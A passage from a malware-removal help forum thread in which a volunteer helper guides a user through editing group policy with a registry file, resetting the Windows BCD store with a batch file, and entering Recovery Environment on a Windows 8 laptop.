  • On the Automatic Repair screen, click Advanced options.
  • On the next screen, click Troubleshoot.
  • On the next screen, click Advanced options.
  • On the next screen, click Command Prompt.

Do you see x:\windows\system32> and a blinking cursor? If you don't see this, stop here and describe all symptoms. What step failed and what did you see?
 
 
In your next reply...

  • Copy and paste the entire contents of BCD_Reset.txt into the body of your message.
  • If you can't find BCD_Reset.txt in the root directory of your thumb drive or if you didn't see Success when you tried to reset BCD store, tell me what step failed and what did you see. Give me a full description.
  • Did you see x:\windows\system32> and a blinking cursor? If not, which step failed? What did you see? Give me a full description.

Thank you,
 
Ray


I don't accept payment for my help, but it would please me if you perform a kindness for your neighbor. You might also contact your local animal shelter. They can always use a bag of kibble or a few cans of pet food. Who knows... you might even find a life-long furry friend there.


#35 danban

danban
  • Topic Starter

  • Members
  • 119 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bronx New York
  • Local time:12:04 PM

Posted 17 June 2018 - 06:00 PM

Hello Ray ,

This is Dan.

 

Ok ,

Give me 1-2 days so I have acess to notepad but also printer , 

so I can print all the instructions to paper to read off when I'm doing the directions to boot up.

 

Also when I right click on Windows 8 , there are 2 commands , 

Command Prompt and Command Prompt Adminstrator.

The first one was the one I have been using the past times even though in only goes in normal boot mode

but can't get pass the Command Prompt Adminstrator , it ask's me for permission and it blocks me.

 

I will work on your new method regardless and see if that works.

 

Best ,

Dan



#36 RayS

RayS

  • Malware Response Team
  • 2,434 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:USA
  • Local time:11:04 AM

Posted 18 June 2018 - 07:39 AM

Hi Dan,
 

can't get pass the Command Prompt Adminstrator , it ask's me for permission and it blocks me.

I'll tell you again: I can't see your computer. In all cases when a step fails or is blocked, I need to know exactly what messages you see on screen. Write the messages down word-for-word and send them to me. Describe fully what happened.
 
 

Also when I right click on Windows 8 , there are 2 commands , Command Prompt and Command Prompt Adminstrator. The first one was the one I have been using the past times even though in only goes in normal boot mode

The commands for resetting the BCD store absolutely require Command Prompt running as administrator. If you don't run as administrator, the commands will definitely fail and you will not be allowed to open Recovery Environment in the next steps. The attached file (GP_Edit.reg) will configure your Command Prompt to always run as administrator.

 

Here is GP_Edit.reg:  
 
 
Edit Group Policy
Note: Follow these steps carefully and completely and in sequence.

  • Please download the attached GP_Edit.reg file and transfer it to the desktop on your sick laptop.
  • Double-click GP_Edit.reg on the desktop of your laptop. (Please do not run GP_Edit.reg on your clean PC.)
  • Click Yes in the User Account Control pop-up window.
  • The Registry Editor pop-up will ask you, "Are you sure you want to continue?". Click Yes.
  • The Registry Editor pop-up will say, "The keys and values ... have been successfully added to the registry". Click OK.
  • Restart your laptop in normal boot.

Stop here
Please don't do anything else with your laptop until you see, "The keys and values ... have been successfully added to the registry". Wait for further instructions.
 
 
In your next reply...

  • Please promise me that you will give me complete descriptions of all the symptoms you see and a word-for-word copy of any messages you see whenever you encounter on your laptop a failure or blockage or unexpected symptoms in any prescribed procedure.
  • Confirm that you did see, "The keys and values ... have been successfully added to the registry" and that you restarted your laptop.

Thank you,
 
Ray


I don't accept payment for my help, but it would please me if you perform a kindness for your neighbor. You might also contact your local animal shelter. They can always use a bag of kibble or a few cans of pet food. Who knows... you might even find a life-long furry friend there.


#37 danban

danban
  • Topic Starter

  • Members
  • 119 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bronx New York
  • Local time:12:04 PM

Posted 19 June 2018 - 11:28 AM

Hello Ray ,

This is Dan.

 

I did'nt do too much yet because of what happend when I attempted to open command prompt.

 

Here's what I did - 

 

  • download the attached GP_Edit.reg file and transfer it to the desktop on your sick laptop.
  • Double-click GP_Edit.reg on the desktop of your laptop. (Please do not run GP_Edit.reg on your clean PC.)

Then the black box apperared and this is what it said on the top -

 

ERROR = You must run the command prompt as admisntrator.

Press any key to continue . . . 

 

Ok , what should I do now , press the key ? and what I should do afterwards ?

I wanted to be safe to ask you before I start anything

 

Best ,

Dan



#38 RayS

RayS

  • Malware Response Team
  • 2,434 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:USA
  • Local time:11:04 AM

Posted 19 June 2018 - 08:25 PM

Hi Dan,

 

Thank you for a complete description of what you saw. The GP_Edit.reg file doesn't open a black window. You probably double-clicked BCDReset.bat. Please look carefully at the files on the desktop of your sick laptop and double-click the GP_Edit.reg file. A small pop-up window with black text on a white background will open. The title of that pop-up is Registry Editor. Then you can continue with the instructions in Post #36.

 

Thank you,

 

Ray


Edited by RayS, 19 June 2018 - 08:27 PM.

I don't accept payment for my help, but it would please me if you perform a kindness for your neighbor. You might also contact your local animal shelter. They can always use a bag of kibble or a few cans of pet food. Who knows... you might even find a life-long furry friend there.


#39 danban

danban
  • Topic Starter

  • Members
  • 119 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bronx New York
  • Local time:12:04 PM

Posted 21 June 2018 - 11:25 AM

Hello Ray ,

This is Dan.

 

I did what you said ,

 

  • I download the attached GP_Edit.reg file and transfer it to the desktop on my sick laptop.
  • I Double-click GP_Edit.reg on the desktop of my laptop. (Please do not run GP_Edit.reg on your clean PC.)
  • I Click Yes in the User Account Control pop-up window.
  • The Registry Editor pop-up will ask me, "Are you sure you want to continue?".
  • I  Click Yes.
  • The Registry Editor pop-up said , "The keys and values ... have been successfully added to the registry".
  • I Click OK.
  • I Restarted my laptop in normal boot.

 

Let me know what to do next.

 

Best ,

Dan



#40 RayS

RayS

  • Malware Response Team
  • 2,434 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:USA
  • Local time:11:04 AM

Posted 21 June 2018 - 01:38 PM

Hey Dan,

 

Excellent!!!

 

You did well. I'll have more instructions for you later tonight.

 

Ray


I don't accept payment for my help, but it would please me if you perform a kindness for your neighbor. You might also contact your local animal shelter. They can always use a bag of kibble or a few cans of pet food. Who knows... you might even find a life-long furry friend there.


#41 RayS

RayS

  • Malware Response Team
  • 2,434 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:USA
  • Local time:11:04 AM

Posted 21 June 2018 - 09:20 PM

Hi Dan,

 

Note: This is second of two consecutive posts.

 

 

Congrats again on doing a good job.
 
Overview
Now that GP_Edit.reg was successful, let's try to reset the BCD store again in normal boot using BCDReset.bat which should still be on your thumb drive. Then I want to try to enter Recovery Environment (RE) by aborting start-up two consecutive times. If Recovery Environment is not still blocked, we will run a fix in RE next time.
 
If the Batch file (BCDreset.bat) is no longer on your thumb drive, you can get it again here:  batfile.gif  BCDreset.bat  
 
Please read this all the way through before you begin.
 
Reset BCD store

  • If your laptop is not already started, restart in normal boot.
  • Insert the thumb drive into your sick laptop.
  • Use Windows Explorer to find the drive letter of your thumb drive on your sick laptop. The drive letter will probably be D:\
  • Press your Windows key and type Command Prompt into the search box.
  • Right-click Command Prompt in your search results and select Run as administrator  <== Important!
  • When the black Command Prompt window opens, be sure the title of the window is Administrator: Command Prompt
  • If the title of the window is not Administrator: Command Prompt then you did something wrong. Close the black Command Prompt window and go back to step 4 and try again (be sure to right-click).
  • Type D:\BCDreset into the Command Prompt window and press Enter. If your thumb drive is on some other letter, then type that letter instead of D.
  • You should see Success in the Command Prompt window.
  • You should also see a file called BCD_Reset.txt on your thumb drive.
  • Copy and paste the contents of BCD_Reset.txt into your reply.

 

 

Enter Recovery Environment using Consecutive Power Interruptions
Note: If you see the black screen with the circling dots going around, that means you didn't interrupt the boot-up process quickly enough in step 3 below.

  • Begin with your sick laptop completely shut down (power OFF).
  • Press the physical power button to begin the boot-up process.
  • After only 3 or 4 seconds, press and hold the power button for a minimum of six seconds to shut down your laptop.
  • Repeat steps 1 through 3 a second time.
  • Press the power button again to begin the boot-up process for a third time and let it continue to completion.

If all went well, you should see Preparing Automatic Repair on a black screen. After a short delay, you should see Diagnosing your PC.

  • On the Automatic Repair screen, click Advanced options.
  • On the next screen, click Troubleshoot.
  • On the next screen, click Advanced options.
  • On the next screen, click Command Prompt.

Do you see x:\windows\system32> and a blinking cursor? If you don't see this, describe all symptoms. What step failed and what did you see?
 
 
Please stop here. If all went well, we will run a fix in RE next time.
 
 
In your next reply...

  • Copy and paste the entire contents of BCD_Reset.txt into the body of your message.
  • If you can't find BCD_Reset.txt in the root directory of your thumb drive or if you didn't see Success when you tried to reset BCD store, tell me what step failed and what did you see. Give me a full description.
  • Did you see x:\windows\system32> and a blinking cursor? If not, which step failed? What did you see? Give me a full description.

Thank you,
 
Ray

Edit: Note indicating this is 2nd of 2 consecutive posts.


Edited by RayS, 21 June 2018 - 11:20 PM.

I don't accept payment for my help, but it would please me if you perform a kindness for your neighbor. You might also contact your local animal shelter. They can always use a bag of kibble or a few cans of pet food. Who knows... you might even find a life-long furry friend there.


#42 danban

danban
  • Topic Starter

  • Members
  • 119 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bronx New York
  • Local time:12:04 PM

Posted 22 June 2018 - 11:09 AM

Hello Ray , 

This is Dan.

 

Ok , I'll get right on in it tonight.

I may be able to send all data using wordpad tomorrow saturday on another computer ,

if not , it will be defiantly Sunday night when I have acess to it.

 

Best ,

Dan



#43 RayS

RayS

  • Malware Response Team
  • 2,434 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:USA
  • Local time:11:04 AM

Posted 22 June 2018 - 01:34 PM

Hi Dan,

 

I may be able to send all data using wordpad tomorrow

I hope that was a typo. You need to use Notepad  --  not any other word processor or text editor.

 

Thank you,

 

Ray


I don't accept payment for my help, but it would please me if you perform a kindness for your neighbor. You might also contact your local animal shelter. They can always use a bag of kibble or a few cans of pet food. Who knows... you might even find a life-long furry friend there.


#44 danban

danban
  • Topic Starter

  • Members
  • 119 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bronx New York
  • Local time:12:04 PM

Posted 22 June 2018 - 01:39 PM

Yeah , that was a typo , 

Notepad , trust me , I know what to use for future logs.

 

Best ,

Dan



#45 danban

danban
  • Topic Starter

  • Members
  • 119 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bronx New York
  • Local time:12:04 PM

Posted 24 June 2018 - 12:27 PM

Hello Ray ,

It's Dan.

 

Ok , great , everything worked perfect.

After I did what you told me the end result was

 

I saw  x:\windows\system32> and a blinking cursor in the command prompt.

 

I did all the steps you asked , so need to show.

 

Let me know what we do next.

 

Here's the BCD_Reset.txt

 

START 

The operation completed successfully.
The operation completed successfully.
END 





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users